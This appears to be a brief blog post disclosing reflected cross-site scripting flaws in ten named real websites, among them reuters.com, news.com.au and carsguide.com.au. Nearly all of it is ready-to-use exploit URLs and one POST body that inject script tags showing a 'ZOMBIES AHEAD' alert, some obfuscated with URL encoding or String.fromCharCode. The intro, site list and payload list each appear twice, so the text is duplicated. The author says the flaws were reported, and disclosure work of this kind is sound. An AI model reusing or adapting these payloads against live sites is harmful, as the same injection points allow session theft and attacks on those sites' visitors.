I had some spare time last weekend and decided to go XSS hunting. Yeah I know old news, old vectors, boooring...
Unfortunately even though XSS is old news in the security community and there are well established techniques to mitigate the attack it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.
Get all the details after the break, or use the quick links below
businessday.com.au
carsguide.com.au
conceptart.org
investsmart.com.au
mycareer.com.au
news.com.au
reuters.com
stays.com.au
three.com.au
thebigchair.com.au
Unfortunately even though XSS is old news in the security community and there are well established techniques to mitigate the attack it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.
Get all the details after the break, or use the quick links below
businessday.com.au
carsguide.com.au
conceptart.org
investsmart.com.au
mycareer.com.au
news.com.au
reuters.com
stays.com.au
three.com.au
thebigchair.com.au
All xss vectors displayed here was reported last weekend and some may have been fixed.
Businessday.com.au;
http://www.businessday.com.au/execute_search.html?text='><script>alert('zombies ahead!');</script><&ss=Business
Carsguide.com.au;
http://www.carsguide.com.au/search/?type=all&Ntt=<script>alert('ZOMBIES AHEAD');</script><
Conceptart.org;
http://www.conceptart.org/index.php?artist=%22%3E%3C/a%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD%27%29;%3C/script%3E%3C
Investsmart.com.au;
http://www.investsmart.com.au/search/?MainSearch=%22%3E%3Cscript%3Ealert(%22ZOMBIES+AHEAD!%22)%3B%3C%2Fscript%3E%3C
Mycareer.com.au;
http://mycareer.com.au/jobseeker/search/results.aspx?s=155&sq=%3C%2ftitle%3E%3Cscript%3Ealert(%27ZOMBIES+AHEAD!%27)%3b%3C%2fscript%3E%3C
News.com.au;
http://search.news.com.au/search?q=abc%3C%2Ftitle%3E%3Cscript%3Ealert%28String.fromCharCode%2890,79,77,66,73,69,83,32,65,72,69,65,68,33%29%29;%3C/script%3E%3C&sid=&us=&as=&ac=&r=typed
Reuters.com;
http://www.reuters.com/search?blob=%22%3E%3Cscript%3Ealert(%27ZOMBIES%20AHEAD!%27);%3C/script%3E%3C
Stayz.com.au;
http://www.stayz.com.au/search.action
POSTDATA: locId=0&locLevel=&location=%22%3E%3Cscript%3Ealert%28%27ZOMBIES+AHEAD%21%27%29%3B%3C%2Fscript%3E%3C&checkin=&numNights=1&minPrice=0&maxPrice=0&numGuests=1&rating=0
Three.com.au;
http://shop.three.com.au/search/searchResult.jsp?query=%22;%3C/script%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD!%27%29;%3C/script%3E%3C&_requestid=542403
Thebigchair.com.au;
http://thebigchair.com.au/consumer/search/results.aspx?q=%3cscript%3ealert(%27zombies+ahead!%27)%3b%3c%2fscript%3e
Businessday.com.au;
http://www.businessday.com.au/execute_search.html?text='><script>alert('zombies ahead!');</script><&ss=Business
Carsguide.com.au;
http://www.carsguide.com.au/search/?type=all&Ntt=<script>alert('ZOMBIES AHEAD');</script><
Conceptart.org;
http://www.conceptart.org/index.php?artist=%22%3E%3C/a%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD%27%29;%3C/script%3E%3C
Investsmart.com.au;
http://www.investsmart.com.au/search/?MainSearch=%22%3E%3Cscript%3Ealert(%22ZOMBIES+AHEAD!%22)%3B%3C%2Fscript%3E%3C
Mycareer.com.au;
http://mycareer.com.au/jobseeker/search/results.aspx?s=155&sq=%3C%2ftitle%3E%3Cscript%3Ealert(%27ZOMBIES+AHEAD!%27)%3b%3C%2fscript%3E%3C
News.com.au;
http://search.news.com.au/search?q=abc%3C%2Ftitle%3E%3Cscript%3Ealert%28String.fromCharCode%2890,79,77,66,73,69,83,32,65,72,69,65,68,33%29%29;%3C/script%3E%3C&sid=&us=&as=&ac=&r=typed
Reuters.com;
http://www.reuters.com/search?blob=%22%3E%3Cscript%3Ealert(%27ZOMBIES%20AHEAD!%27);%3C/script%3E%3C
Stayz.com.au;
http://www.stayz.com.au/search.action
POSTDATA: locId=0&locLevel=&location=%22%3E%3Cscript%3Ealert%28%27ZOMBIES+AHEAD%21%27%29%3B%3C%2Fscript%3E%3C&checkin=&numNights=1&minPrice=0&maxPrice=0&numGuests=1&rating=0
Three.com.au;
http://shop.three.com.au/search/searchResult.jsp?query=%22;%3C/script%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD!%27%29;%3C/script%3E%3C&_requestid=542403
Thebigchair.com.au;
http://thebigchair.com.au/consumer/search/results.aspx?q=%3cscript%3ealert(%27zombies+ahead!%27)%3b%3c%2fscript%3e
